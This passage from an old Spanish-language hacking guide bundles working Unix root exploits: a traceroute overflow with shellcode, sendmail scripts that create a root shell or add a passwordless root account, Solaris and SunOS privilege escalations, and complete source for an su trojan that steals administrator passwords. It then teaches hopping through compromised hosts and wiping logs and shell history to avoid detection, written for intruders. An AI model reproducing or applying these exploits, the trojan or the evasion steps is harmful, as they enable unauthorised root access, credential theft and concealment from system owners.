  8993.   hole can exist on their system.  If you use it for the wrong reasons
  8994.   then I say *tisk* on you.  I will not be held responsible for your 
  8995.   actions.
  8996.   
  8997.   This could be done with a generic overflow program, but just
  8998.   running this is easier.
  8999.  
  9000.   USAGE OF THIS DOES NOT GIVE YOU TECH SUPPORT SO DON'T
  9001.   MESSAGE ANYBODY ON IRC ABOUT THIS.
  9002.  
  9003. */
  9004.  
  9005. #include <stdio.h>
  9006. #include <stdlib.h>
  9007. #include <unistd.h>
  9008. char *shellcode =
  9009.   "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
  9010.   "\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
  9011.   "\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
  9012.   "\xcd\x80/"
  9013.   "/bin/sh"
  9014.   "0";
  9015. char *get_sp() {
  9016.    asm("movl %esp,%eax");
  9017. }
  9018. #define bufsize 2048
  9019. char buffer[bufsize];
  9020. main() {
  9021.   int i;
  9022.   for (i = 0; i < bufsize - 4; i += 4)
  9023.     *(char **)&buffer[i] = get_sp() - 3072;
  9024.   memset(buffer, 0x90, 512);
  9025.   memcpy(&buffer[512], shellcode, strlen(shellcode));
  9026.   buffer[bufsize - 1] = 0;
  9027.   system("clear");
  9028.   
  9029. printf("__________________________________________________________
  9030. ____________________\n");
  9031.   printf("| Traceroute Overflow -- (c) shit-head 1997\n");
  9032.   printf("| Give props to Solar Designer for his su overflow, this is based on 
  9033. that.\n");
  9034.   printf("|\n");
  9035.   printf("| Peep's to: suid, knowy, thugzsta, you all be 2 cool.\n");
  9036.   printf("|\n");
  9037.   printf("| *NOTE* I'm not responsible if you abuse this. Run only w/ 
  9038. premission\n");
  9039.   printf("| Sending Overflow.... Done.\n");
  9040.   printf("------------------------------------------------------------------------------\n");
  9041.   setenv("NLSPATH", buffer, 1);
  9042.   execl("/usr/bin/traceroute", "/usr/bin/traceroute", NULL);
  9043. }
  9044.  
  9045. ------------ FIN -------------------------------------------------------------
  9046.  
  9047.   SENDMAIL
  9048.  
  9049. ------------ Codigo Fuente ---------------------------------------------------
  9050.  
  9051.         Aunque obviamente el sendmail no es un sistema operativo pongo
  9052.   algunos xploits para el, ya que es el clasico de los holes en maquinas unix.
  9053.  
  9054.  
  9055.   Sendmail 8.7-8.8.2
  9056.  
  9057.  
  9058. #/bin/sh 
  9059. #                                   Hi ! 
  9060. #                This is exploit for sendmail smtpd bug 
  9061. #    (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms). 
  9062. #         This shell script does a root shell in /tmp directory. 
  9063. #          If you have any problems with it, drop me a letter. 
  9064. #                                Have fun ! 
  9065. #                           ---------------------- 
  9066. #               --------------------------------------------- 
  9067. #    -----------------   Dedicated to my beautiful lady   ------------------ 
  9068. #               --------------------------------------------- 
  9069. #                           ---------------------- 
  9070. #          Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su 
  9071. echo   'main()                                                '>>leshka.c 
  9072. echo   '{                                                     '>>leshka.c 
  9073. echo   '  execl("/usr/sbin/sendmail","/tmp/smtpd",0);         '>>leshka.c 
  9074. echo   '}                                                     '>>leshka.c 
  9075. echo   'main()                                                '>>smtpd.c 
  9076. echo   '{                                                     '>>smtpd.c 
  9077. echo   '  setuid(0); setgid(0);                               '>>smtpd.c 
  9078. echo   '  system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh");      '>>smtpd.c 
  9079. echo   '}                                                     '>>smtpd.c 
  9080. cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c 
  9081. ./leshka 
  9082. kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]"
  9083. "\n"|head -n 1`
  9084. rm leshka.c leshka smtpd.c /tmp/smtpd 
  9085. /tmp/sh 
  9086.  
  9087.   Descripcion y Notas:
  9088.  
  9089.         Este bug se basa en el hecho de que sendmail es un programa suid root
  9090.   y como tal puede ser invocado como demonio por cualquier usuario y tras
  9091.   ello cargar una pieza de codigo de cualquier parte por lo tanto el usuario
  9092.   puede mandar "señales" a sendmail y controlarlo con los beneficios que ello
  9093.   conlleva, basicamente el bug trastoca el HUP handler para permitir esto.
  9094.  
  9095. ------------ FIN -------------------------------------------------------------
  9096.  
  9097.   Otro para el sendmail 8.8.4:
  9098.  
  9099. ------------ Codigo Fuente ---------------------------------------------------
  9100.  
  9101. Try this:
  9102. Make hard link of /etc/passwd to /var/tmp/dead.letter
  9103. Telnet to port 25, send mail from some bad email address to some 
  9104. unreacheable hoost.
  9105. Watch your message get appended to passwd.
  9106. ie:
  9107. cowzilla::0:0:c0wz1ll4 0wns u:/:/bin/sh
  9108.  
  9109. This is not good.  Worked with my 8.8.4, will probably also work with 8.8.5
  9110.  
  9111. Root for the whole family
  9112.  
  9113. ============================================================
  9114. ======
  9115.  
  9116. okay, just want to point out some things about this exploit...
  9117. this won't work on big boxes that are partitioned cause you can only do a
  9118. hard link on the same file system.  another point is that any box that has
  9119. a 'MAILER-DAEMON' defined will get any mail that gets sent there instead of it
  9120. saving it to /var/tmp/dead.letter, ie, make an /etc/aliases file that defines
  9121. a MAILER-DAEMON. for instance, i add these two to my /etc/aliases:
  9122.  
  9123. MAILER-DAEMON:gonzo
  9124. postmaster:gonzo
  9125.  
  9126. then you just type 'newaliases' and you're good to go. (postmaster is a
  9127. general good idea) course then you have to deal with ppl's messed up mail...
  9128.  
  9129.  
  9130. ============================================================
  9131. =======
  9132.  
  9133. Here's a nice little sendmail exploit that works with 8.8.4 and maybe with
  9134. 8.8.5.
  9135. You need to have an account on the system you're exploiting.
  9136. telnet to your shell and issue following commands:
  9137.  
  9138. ln /etc/passwd /var/tmp/dead.letter
  9139. telnet target.host 25
  9140. mail from: non@existent.host
  9141. rcpt to: non@existent.host
  9142. data
  9143. kRad::0:0:J0oR dEaD:/root:/bin/bash
  9144. .
  9145. quit
  9146.  
  9147. The body of the message will be written into /etc/passwd and you've got a 
  9148. password-free root account.
  9149.  
  9150. Note that this will NOT work under any of the following circumstances:
  9151.  
  9152. 1. /var and / are different partitions.
  9153.     You can't make a hardlink between different partitions.
  9154. 2. There is a postmaster account or mail alias.
  9155.     Mail problems are sent to postmaster before they go to
  9156.     /var/tmp/dead.letter.    
  9157. 3. /var/tmp doesn't exist or isn't publicly writable.
  9158.     Duh.
  9159. 4. Other situations?
  9160.  
  9161. ------------ FIN -------------------------------------------------------------
  9162.  
  9163.   SOLARIS
  9164.  
  9165. ------------ Codigo Fuente ---------------------------------------------------
  9166.  
  9167. I have found a security hole in sdtcm_convert on Solaris 2.5.1. sdtcm_convert
  9168. - calendar data conversion utility - allows any user to change the owner for
  9169. any file (or directory) from the system or gain root access. The exploit is
  9170. very simple. Change the permision mode of your calendar file (callog.YOU)
  9171. from /var/spool/calendar directory (usual r--rw----) and run sdtcm_convert. 
  9172. sdtcm_convert 'll observe the change and 'll want  to correct it (it 'll ask
  9173. you first). You have only to delete the callog file and make a symbolic link
  9174. to a target file and your calendar file and said to sdtcm_convert 'y' (yes).
  9175. sdtcm_convert 'll make you the owner of target file ...
  9176. A simple way to correct this is to get out suid_exec bit from sdtcm_convert.
  9177.  
  9178. -----------------------------------------------------------------------------
  9179.  
  9180.  CDE is generally a can of worms.
  9181.  
  9182.  22:15  [wumpus:~] % whoami
  9183.  adam
  9184.  22:15  [wumpus:~] % ls -l /etc/shadow
  9185.  -r--------   1 root     sys          291 Jul 11 22:14 /etc/shadow
  9186.  22:15  [wumpus:~] % ln -s /etc/shadow /tmp/calorig.adam
  9187.  22:15  [wumpus:~] % /usr/dt/bin/sdtcm_convert -d /tmp -v 3 adam
  9188.  Loading the calendar ...
  9189.  
  9190.  WARNING!! Data will be lost when converting version 4 data format
  9191.  back to version 3 data format.
  9192.  
  9193.  Do you want to continue? (Y/N) [Y] y
  9194.  
  9195.  Doing conversion ...
  9196.  Writing out new file ...
  9197.  Conversion done successfully.
  9198.  Total number of appointments                    = 0
  9199.  Number of one-time appointments converted       = 0
  9200.  Number of repeating appointments converted      = 0
  9201.  Number of one-time appointments pruned          = 0
  9202.  Number of repeating appointments pruned         = 0
  9203.  The original file is saved in /tmp/calorig.adam
  9204.  22:15  [wumpus:~] % ls -l /etc/shadow
  9205.  -r--rw----   1 adam     daemon      3114 Jul 11 22:15 /etc/shadow
  9206.  22:15  [wumpus:~] % chmod 644 /etc/shadow
  9207.  22:15  [wumpus:~] % cp /dev/null /etc/shadow
  9208.  cp: overwrite /etc/shadow (y/n)? y
  9209.  22:15  [wumpus:~] % ls -l /etc/shadow
  9210.  -rw-r--r--   1 adam     daemon         0 Jul 11 22:15 /etc/shadow
  9211.  22:15  [wumpus:~] % echo "root::6445::::::" >> /etc/shadow
  9212.  22:16  [wumpus:~] % su
  9213.  # id
  9214.  uid=0(root) gid=1(other)
  9215.  # exit
  9216.  
  9217. ------------ FIN -------------------------------------------------------------
  9218.  
  9219.   OTRO PARA SOLARIS
  9220.  
  9221. ------------ Codigo Fuente ---------------------------------------------------
  9222.  
  9223. Author: mudge@l0pht.com
  9224.  
  9225. Overview:
  9226.  
  9227. A buffer overflow condition exists in the getopt(3) routine. By supplying
  9228. an invalid option and replacing argv[0] of a SUID program that uses the
  9229. getopt(3) function with the appropriate address and machine code instructions,
  9230. it is possible to overwrite the saved stack frame and upon return(s) force
  9231. the processor to execute user supplied instructions with elevated permissions.
  9232.  
  9233. Description:
  9234.  
  9235. While evaluating programs in the Solaris Operating System environment 
  9236. it became apparent that changing many programs trust argv[0] to never
  9237. exceed a certain length. In addition it seemed as though getopt was
  9238. simply copying argv[0] into a fixed size character array.
  9239.  
  9240.   ./test >>& ccc
  9241.   Illegal instruction (core dumped)
  9242.  
  9243. Knowing that the code in ./test was overflow free it seemed that the problem
  9244. must exist in one of the functions dynamically linked in at runtime through
  9245. ld.so. A quick gander through the namelist showed a very limited range of
  9246. choices for the problem to exist in.
  9247.  
  9248.   00020890 B _end
  9249.   0002088c B _environ
  9250.   00010782 R _etext
  9251.            U _exit
  9252.   00010760 ? _fini
  9253.   0001074c ? _init
  9254.   00010778 R _lib_version
  9255.   000105ac T _start
  9256.            U atexit
  9257.   0002088c W environ
  9258.            U exit
  9259.   0001067c t fini_dummy
  9260.   0002087c d force_to_data
  9261.   0002087c d force_to_data
  9262.   000106e4 t gcc2_compiled.
  9263.   00010620 t gcc2_compiled.
  9264.            U getopt
  9265.   00010740 t init_dummy
  9266.   00010688 T main
  9267.  
  9268. Next we checked out getopt() - as it looked like the most likely
  9269. suspect.
  9270.  
  9271.   #include <stdio.h>
  9272.  
  9273.   main(int argc, char **argv)
  9274.   {
  9275.     int opt;
  9276.  
  9277.     while ((opt = getopt(argc, argv, "a")) != EOF) {
  9278.       switch (opt) {
  9279.       }
  9280.     }
  9281.   }
  9282.  
  9283.   >gcc -o test test.c
  9284.   >./test -z
  9285.   ./test: illegal option -- z
  9286.  
  9287. Note the name it threw back at the beggining of the error message. It was
  9288. quite obvious that they are just yanking argv[0]. Changing argv[0] in 
  9289. the test program confirms this.
  9290.  
  9291.   for (i=0; i< 4096; i++)
  9292.     buffer[i] = 0x41;
  9293.  
  9294.    argv[0] = buffer;
  9295.  
  9296. With the above in place we see the following result:
  9297.   >./test -z
  9298.   [lot's of A's removed]AAAAAAAAA: illegal option -- z
  9299.   Bus error (core dumped)
  9300.  
  9301. By yanking out the object file from the static archive libc that is supplied
  9302. with Solaris our culprit was spotted [note - we assumed that libc.a was
  9303. built from the same code base that libc.so was].
  9304.  
  9305.   > nm getopt.o
  9306.            U _dgettext
  9307.   00000000 T _getopt
  9308.   00000000 D _sp
  9309.            U _write
  9310.   00000000 W getopt
  9311.            U optarg
  9312.            U opterr
  9313.            U optind
  9314.            U optopt
  9315.            U sprintf
  9316.            U strchr
  9317.            U strcmp
  9318.            U strlen
  9319.  
  9320. Here we see one of the infamous non-bounds-checking routines: sprintf();
  9321. More than likely the code inside getopt.c looks something like the following:
  9322.  
  9323.   getopt.c:
  9324.     char opterr[SOMESIZE];
  9325.     ...
  9326.     sprintf(opterr, argv[0]...);
  9327.  
  9328. Thus, whenever you pass in a non-existant option to a program that uses getopt
  9329. you run into the potential problem with trusting that argv[0] is smaller
  9330. than the space that has been allocated for opterr[]. 
  9331.  
  9332. This is interesting on the Sparc architecture as getopt() is usually called
  9333. out of main() and you need two returns [note - there are certain situations
  9334. in code on Sparc architectures that allow you to switch execution to your 
  9335. own code without needing two returns. Take a look at the TBR for some
  9336. enjoyable hacking] due to the sliding register windows. Some quick analysis
  9337. of SUID programs on a standard Solaris 2.5 box show that most of these
  9338. programs exit() or more likely call some form of usage()-exit() in the
  9339. default case for getopt and thus are not exploitable. However, at least
  9340. two of these programs provide the necessary returns to throw your
  9341. address into the PC :
  9342.      passwd(1)
  9343.      login(1)
  9344.  
  9345. On Solaris X86 you do not need these double returns and thus a whole world of
  9346. SUID programs allow unpriveledged users to gain root access: 
  9347.     (list of programs vulnerable too big to put here. sigh.)
  9348.  
  9349. Exploit:
  9350.  
  9351.  
  9352.   $./exploit "/bin/passwd" 4375 2> foo
  9353.   # id
  9354.   uid=0(root) gid=1(other)
  9355.  
  9356. ------------ FIN -------------------------------------------------------------
  9357.  
  9358.   SUNOS
  9359.  
  9360. ------------ Codigo Fuente ---------------------------------------------------
  9361.  
  9362. **************************************************************************
  9363.    HACK: Exploit the patched "loadmodule" with a path attack [8lgm]
  9364.  System: Sun OS 4.1.x (?others)
  9365.  Source: 8lgm
  9366.    Date: Jan 2, 1995
  9367. **************************************************************************
  9368.  
  9369.  
  9370. VERSIONES VULNERABLES:
  9371.  
  9372.         SunOS 4.1.* & Openwindows 3 con el ultimo parche para loadmodule.
  9373.  
  9374. DESCRIPCION:
  9375.  
  9376.         loadmodule usa system(3) para encontrar la arquitectura de la maquina.
  9377.  
  9378. IMPACTO:
  9379.  
  9380.         Usuarios locales pueden obtener acceso como r00t.
  9381.  
  9382. REPETIDO POR:
  9383.         
  9384.         Insertar el directorio local al comienzo de tu path
  9385.                 $ set path=(. $path)
  9386.  
  9387.         Copiar un shell y darle los atributos 711
  9388.                 $ echo "/bin/sh" > ld
  9389.                 $ chmod 711 ld
  9390.  
  9391.         Ejecutar loadmodule con una llamada limpia y obtener un shell
  9392.         de r00t
  9393.                 $ /usr/openwin/loadmodule sd.o evqload
  9394.                 # whoami
  9395.                 root
  9396.  
  9397. ------------ FIN -------------------------------------------------------------
  9398.  
  9399.         Bueno, creo que ya han sido suficientes, a ver si para proximas
  9400.   ediciones del texto me lo curro un poco mas y los busco mas elegidos pero
  9401.   ahora viene el follon de examenes :o(   y los he pillado un poco al azar. A
  9402.   ver si tengo tiempo y en la proxima edicion pongo los que dan mas resultado
  9403.   e intento explicar un poco las pegas que tienen.. perdon por mi
  9404.   incompetencia jeje
  9405.  
  9406.         En realidad, por lo menos lo que hago yo en empaquetarlos en un tgz ya
  9407.   que los tengo ordenados por sistemas operativos y por versiones, subirlos a
  9408.   la maquina victima con ftp y rular los ke puedan servir para esa makina en 
  9409.   concreto. Para algunos sistemas operativos, tengo hechos scripts en shell
  9410.   que te los rulan automaticamente.. akonsejo ke lo hagais, no es dificil y
  9411.   te evitas tiempo :)
  9412.  
  9413.   7.3.- TROYANOS
  9414.  
  9415.         Bueno, un troyano es un programa que modifica su funcion habitual para
  9416.   conseguir algun objetivo que nos interese. En principio, una de las
  9417.   utilidades mas importantes de los troyanos es dejar backdoors con los
  9418.   tipicos troyanos del login, telnetd, fingerd y demas... espero que en
  9419.   posteriores ediciones del texto tenga tiempo para explicarlos estos un poco.
  9420.   Pero como en esta seccion lo que nos interesan son modos de pillar root, voy
  9421.   a contar un poco como usar el troyano de su para conseguir ese objetivo.
  9422.  
  9423.         Para aquellos que vais un poco verdes en unix, explico lo que es el
  9424.   su. En principio hay muchos administradores que entran con una cuenta de
  9425.   usuario normal y cuando necesitan hacer algo que requiere que sean root,
  9426.   ejecutan el comando su que permite cambiar el usuario a root. Esto se hace
  9427.   ya que no es conveniente ser root en la maquina por posibles metidas de
  9428.   pata (sobretodo a altas horas de la mañana jeje) y si por ejemplo haces un
  9429.   rm sobre un fichero importante y no eres root, no pasa nada en general ya
  9430.   que no tendras permisos para hacerlo.
  9431.  
  9432.         Para usar este sistema, hay que buscar quien usa su. Esto se puede
  9433.   hacer viendo en el /var/adm/messages (si tienes permisos para leerlo), el
  9434.   sulog u otros archivos de log dependiendo del sistema en el que estes, o
  9435.   bien entrar en los directorios HOME (si tienes permisos) y ver los history
  9436.   (que son distintos dependiendo del shell que se usa.. estan explicados en
  9437.   el apartado de borrar huellas) ya que en esos archivos se ven todos los
  9438.   comandos ejecutados por el usuario.
  9439.  
  9440.         Es decir, con esta tecnica tambien tenemos que sacar un passwd de 
  9441.   administrador, pero hay que tener en cuenta que si por ejemplo es una 
  9442.   maquina con dos users con id=0 y que ademas cada uno de ellos entra con 
  9443.   una cuenta normal para hacer luego su, hay 4 cuentas de "root" por lo que 
  9444.   pasando unos cuantos diccionarios es facil que caiga alguna de las cuatro.
  9445.  
  9446.         En fin, siguiendo con el rollo y suponiendo que tenemos la cuenta de
  9447.   ese user que luego hace su root, se ha de cambiar la variable path a un
  9448.   directorio donde pongamos el su troyano, es decir, pillamos el codigo del
  9449.   su, lo compilamos y lo metemos en un directorio cualquiera buscando que no
  9450.   cante mucho. Ese directorio lo ponemos en el path de manera que este antes
  9451.   que el directorio por defecto donde esta el su verdadero. Por ejemplo, si
  9452.   el path es:
  9453.  
  9454.   PATH=/bin/:/sbin/.........
  9455.  
  9456.         Tendria que ponerse si el directorio donde esta el troyano de su, se
  9457.         llama /.troyano:
  9458.  
  9459.   PATH=/.troyano:/bin:/sbin......
  9460.  
  9461.         Asi, si el administrador que no ha entrado con la cuenta de root hace
  9462.   su, entrara el troyano que lo que hace pedirle el passwd y le dice que es
  9463.   un passwd incorrecto con lo que el pensara que se ha equivocado
  9464.   introduciendo el dato y te guarda el passwd en un fichero determinado. Tras
  9465.   esto, el su troyano se borra automaticamente por lo que pierde el rastro.
  9466.  
  9467.         Esto puede tener algunas pegas como son que esa variable nueva
  9468.   añadida al path canta un poco, que el tio se mosquee cuando el su le de
  9469.   error, y alguno mas que pueden ir surgiendo sobre la marcha, o sea, que
  9470.   probadlo que da buenos resultados aunque teneis que tener cuidado con estas
  9471.   pegas.
  9472.  
  9473.   Bueno, ahi va el codigo:
  9474.  
  9475. ------------ Codigo Fuente ---------------------------------------------------
  9476.  
  9477. /* su trojan ribbed - by FA-Q
  9478.  * werd to lwn for his help.
  9479.  * mkdir .elm
  9480.  * cc -o ~/.elm/su su.c
  9481.  * edit .bash_profile or .bashrc
  9482.  * add PATH=$HOME/.elm:$PATH
  9483.  */
  9484.  
  9485. #include <stdio.h>
  9486. #include <stdlib.h>
  9487.  
  9488. #define SU_PASS "/tmp/.rewt"
  9489.  
  9490. main (int argc, char *argv[])
  9491. {
  9492.    char *key;
  9493.    char buf[24];
  9494.    FILE *fd;
  9495.  
  9496.    key = (char *)getpass ("Password:");
  9497.    fd = fopen(SU_PASS,"w");
  9498.    fprintf(fd, "pass: %s\n", key);
  9499.    fclose(fd);
  9500.    printf ("su: incorrect password\n");
  9501.    sprintf(buf, "rm %s", argv[0]);
  9502.    system(buf);
  9503.    exit (1);
  9504. }
  9505.  
  9506. ------------ FIN -------------------------------------------------------------
  9507.  
  9508.         Bueno, creo que con estos tres metodos sera suficiente para pillar
  9509.   root en muchas makinas... una de las cosas mas importantes es buscar
  9510.   exploits, asi ke buscando un poko en la red, tendreis muchiiiisimos :)
  9511.  
  9512.   8- HACKEAR CON CONDON ( o gateway)
  9513.  
  9514.         Tras explicar los metodos para entrar en maquinas y pillar root, en
  9515.   este y el proximo apartado se va a explicar un poco que hacer para ke no te
  9516.   pillen.
  9517.  
  9518.         En general, cuando tu hackeas una maquina sin ningun tipo de
  9519.   proteccion, simplemente haces telnet victima.com o ftp o el servicio que
  9520.   quieras. Esto esta muy bien porque claramente la distancia mas corta entre
  9521.   dos puntos es la linea recta, pero el problema es que en algunos logs de la
  9522.   maquina victima aparece nuestro ip y por tanto nos tienen perfectamente
  9523.   identificados con solo hacer un last.
  9524.  
  9525.         Hay que puntualizar que otra manera de hacer las cosas es no usar
  9526.   condon pero tener mucha experiencia en el borrado de huellas pero eso no es 
  9527.   aconsejable si no estas muy seguro de tus habilidades.
  9528.  
  9529.         Un tema a discutir, seria cuando hay que usar protecciones o no. Un
  9530.   consejo personal es hacerlo dependiendo del tipo de maquina y del tipo de
  9531.   cosas que se van a hacer en ella. No es lo mismo entrar en una maquina de
  9532.   una universidad que sabemos que el root no esta muy experimentado que
  9533.   entrar en una maquina con medidas serias de seguridad. Tampoco es lo mismo
  9534.   entrar para ver que la cuenta que has pillado funciona, hacer un ls y poco
  9535.   mas, que entrar, ejecutar xploits, poner un sniffer, etc. Obviamente, en el
  9536.   segundo caso hay que tomar algun tipo de proteccion si no quieres acabar en
  9537.   la carcel. Ademas, mi opinion es que este sistema es un metodo de seguridad
  9538.   adicional ademas obviamente de borrar huellas y usar este sistema
  9539.   simplemente por si has fallado en algo pero no solo usar esto. Ademas, si
  9540.   tienes una cuenta y la usas con condon y no borras huellas, no te pillaran,
  9541.   pero seguramente veran los logs y te cancelaran la cuenta o cambiaran cosas
  9542.   del sistema dependiendo lo que hayas hecho. Te quitaran el sniffer, te
  9543.   quitaran si tienes sushi, si tienes alguna backdoor, etc.
  9544.  
  9545.         La manera de trabajar usando condon, consiste en usar maquinas
  9546.   intermedias para saltar de una en otra hasta llegar a la maquina objetivo.
  9547.   El esquema seria:
  9548.  
  9549.   Mimaquina-->Condon1-->Condon2-->Victima.com
  9550.  
  9551.         Ponemos el ejemplo de dos maquinas intermedias que sera suficiente
  9552.   para la mayoria de casos, pero lo que es cierto es que como las maquinas
  9553.   condon sean un poco lentas.. nos podemos morir de asco y de aburrimiento:o(
  9554.  
  9555.         En el ejemplo anterior, si en victima.com nos pillan, aparecemos con
  9556.   el ip de la maquina condon2 por lo que no sera la nuestra. Si quisieran
  9557.   pillarnos tendria que ir el root de la victima.com a hablar con el root de
  9558.   condon2 para convencerle de que le de tu ip ya que la maquina condon2
  9559.   tendra tu conexion en su log (siempre que no hayas borrado huellas en la
  9560.   maquina condon2, cosa que seria conveniente). Raramente un root de
  9561.   victima.com hablara con condon2 diciendole que les ha entrado un hacker y
  9562.   pidiendoles ayuda y sobre todo si una es de Japon y la otra de Noruega
  9563.   (jeje) pero en casos extremos todo esto se podria hacer legalmente por
  9564.   parte de la policia, pero tienes que hacer algo muy gordo para eso. Ademas,
  9565.   como se ha usado otra maquina condon1 se multiplican nuevamente todos los
  9566.   problemas para localizarte por lo que sera improbable si has borrado las
  9567.   huellas medianamente bien. El problema de esto es que si saltas a una
  9568.   makina de japon y luego a otra de noruega y luego a otra de españa, puedes
  9569.   tardar 10 minutos en que llegue a la destino si las intermedias van lentas:(
  9570.  
  9571.         Por ejemplo, si queremos hacer un telnet usando dos condones, el 
  9572.   procedimiento seria:
  9573.  
  9574.   % telnet condon1.com
  9575.  
  9576.         Te cuenta un rollo y te pide login y pass (que deben ser conocidos)
  9577.   UNIX v.4.5
  9578.   Login: aaaaaa
  9579.   Password: xxxxxx
  9580.         Te da acceso a esa maquina y haces otro telnet:
  9581.   % telnet condon2.com
  9582.  
  9583.         Te cuenta otro rollo y te pide login y pass
  9584.   IRIS v.3.5 Please Login
  9585.   Login: pepito
  9586.   Password: xxxx
  9587.   % telnet victima.com <---------Sistema con seguridad seria
  9588.         Te cuenta otro rollo y lo mismo:
  9589.  
  9590.   Login: porfinllego
  9591.   Password: xxxxxxxx
  9592.   Bienvenido!
  9593.  
  9594.         Y asi ya estamos en la maquina victima con 2 condones. Supongo que 
  9595.   entendeis el tema. Este procedimiento se puede usar con cualquier servicio: 
  9596.   telnet, ftp, etc.
  9597.  
  9598.         Es indispensable que las maquinas condon sean bastantes conocidas por
  9599.   el hacker, es decir, que sepas que el root no controla demasiado o que por
  9600.   algun motivo sabes que esta bajo tu control absoluto (aunque recuerdo que
  9601.   no siempre todo es como parece ser :o( porque quiza te pases de listo
  9602.   pensando que el root no tiene ni puta idea y resulta que te esta tomando el
  9603.   pelo), ya que como haya algun contratiempo puedes acabar en la carcel :o( o
  9604.   tambien seria una putada que el root de esa makina sea un tio competente (u
  9605.   otro hacker) y te este vigilando en todo lo que hagas y te este logeando
  9606.   todo lo que haces con los correspondientes inconvenientes.
  9607.  
  9608.         Sobre esto, he de decir que se debe tener en cuenta que hay
  9609.   administradores que controlan todos los aspectos del hacking y te pueden
  9610.   estar haciendo exactamente lo que piensas que le estas haciendo a el, es
  9611.   decir, el puede tener puestos troyanos para ocultar su presencia o para
  9612.   ocultar procesos suyos que te pueden estar logeando, pillais la idea no?..
  9613.   de hecho muchos hackers que conozco que son roots de maquinas usan este
  9614.   tipo de cosas... asi que tened cuidado ahi fuera ;o)
  9615.  
  9616.   9.- BORRAR HUELLAS
  9617.  
  9618.         En el apartado 8 se ha explicado como proteger que te localicen pero
  9619.   siempre ha de estar combinado el uso de condon con el borrado de huellas.
  9620.  
  9621.         El borrado de huellas es una de las tareas mas importantes cuando se
  9622.   entra en una maquina ya que si detectan que has entrado se mosquearan y
  9623.   buscaran como conseguir eliminarte y aunque el root no se entere mucho,
  9624.   siempre puede pedirle a alguien ayuda y que te descubran los troyanos,
  9625.   rootkits y demas ingenios maleficos..:( .. por esto, lo mejor es que no
  9626.   detecten que has entrado y esto se consigue borrando las huellas tal y como
  9627.   se explica a continuacion.
  9628.  
  9629.         El problema del borrado de huellas es que para borrar poder borrar
  9630.   todas las huellas has de ser root (excepto algunos sunos que se podia
  9631.   modificar un fichero de log aunke no todos) y ademas en algunos sistemas
  9632.   con sistemas adicionales de logs o de seguridad borrar todas las huellas se
  9633.   puede convertir en una tarea compleja.
  9634.  
  9635.         Un consejo particular es que el hackeo de la maquina, a ser posible,
  9636.   es mejor hacerlo todo de una. Es decir, que si por ejemplo consigues el
  9637.   fichero de passwd con un bug remoto (por ejemplo el phf), eso deja logs en
  9638.   el httpd por lo que lo mas interesante es pillar el fichero de passwd y
  9639.   desencriptarlo con el john (o si pillas una shell remota no necesitas
  9640.   desencriptar), entrar e intentar hacerte root para poder borrar las
  9641.   huellas... todo de un tiron.
  9642.  
  9643.         Os podeis preguntar que si no es mas comodo hacerlo en varios dias..
  9644.   la respuesta es que es mas comodo hacerlo en varios dias, pero tened en
  9645.   cuenta que si por ejemplo pillais el fichero de passwd con el phf un lunes
  9646.   noche, y hasta el jueves no os poneis de nuevo con la maquina, el root
  9647.   puede haber visto los logs del httpd en martes y darse cuenta de que tiene
  9648.   un hacker rondando... una putada no?... sin embargo, si el mismo lunes,
  9649.   entrais usando el phf, rulais xploits y os haceis root y usais las tecnicas
  9650.   explicadas en esta seccion para borrar huellas, sereis roots y ademas no
  9651.   tendra manera de detectarlo... esta bien no??
  9652.  
  9653.         Por cierto, aunque no venga mucho al caso, aconsejo que al entrar en
  9654.   una maquina, antes de hacer cosas, hagais un who.. aunque tened en cuenta
  9655.   que hay que saber interpretar los resultados del who ya que a veces pueden
  9656.   estar semi-adulterados.
  9657.  
  9658.         Otra cosa es que hay que ser un poco cuidadoso con lo que se hace. Hay 
  9659.   mucha gente que sube los xploits a las maquinas y los zappers y luego no se 
  9660.   preocupan ni de borrarlos ni de nada.. opino que tampoco cuesta mucho meter 
  9661.   todos los xploit en un directorio .xploit y antes de irte hacer un rm -r
  9662.   .xploit... es ke da un poko de pena ir por una makina y encontrartela llena
  9663.   de xploits y de ficheros de passwd por los homes de los usuarios :(
  9664.  
  9665.         En fin, vamos al grano... los sistemas operativos llevan por defecto
  9666.   bastantes logs (log es un archivo que guarda informacion) : en los textos
  9667.   que he mirado por ahi la mayoria hablan del wtmp, utmp y lastlog y algunos
  9668.   hablan sobre el acct, pero en realidad hay que tener cuidado con algunos
  9669.   logs mas como pueda ser el que registra las entradas por ftp, todos los que
  9670.   genera el syslogd, los del httpd, etc.
  9671.  
  9672.         Ademas para joder mas, existen programas especificos para ejercer
  9673.   tareas adicionales como puedan ser el tripwire (comprobador de binarios),
  9674.   tcp-wrappers, log daemons adicionales, etc pero en fin... todo esto lo
  9675.   dejaremos para otro texto que vienen los examenes pronto y tengo poco
  9676.   tiempo jeje 
  9677.  
  9678.         Bien, seas o no seas root, has de tener cuidado con el history. El
  9679.   history es un archivo que guarda todos los comandos que ejecutas y que por
  9680.   ejemplo en la bash se llama .bash_history.
  9681.  
  9682.         Para evitar que se haga el history tienes varias alternativas:
  9683.  
  9684.   unset history
  9685.   o
  9686.   poner un set y hacer algo del tipo HISTFILE=/dev/null
  9687.   o
  9688.   ln -s /dev/null /.bash_history (suponiendo que estamos en bash shell)
  9689.  
  9690.         El sistema que yo uso es ejecutar una csh ke no deja archivo history
  9691.   kon lo ke te olvidas de este problema :)
  9692.  
  9693.         Otra historia para tener en cuenta es que si entras en la tipica
  9694.   maquina que te dice quien fue el ultimo usuario que entro a esa cuenta,
  9695.   podria ser sospechoso si entras a una maquina alemana y ve que
  9696.  
  9697.   Lastlogin by pepito.es 23-01-1997
  9698.  
  9699.         Opino que seria mosqueante no?... asi que si no conseguimos ser root y 
  9700.   podemos borrarlo con el cloak o similar, lo que tenemos que hacer es un
  9701.   telnet maquinavictima.de y asi cuando entre la siguiente persona vera:
  9702.  
  9703.   Lastlogin by maquinavictima.de 23-01-1997
  9704.  
  9705.         Que aunque no es perfecto, es mejor que en el caso anterior no?
  9706.  
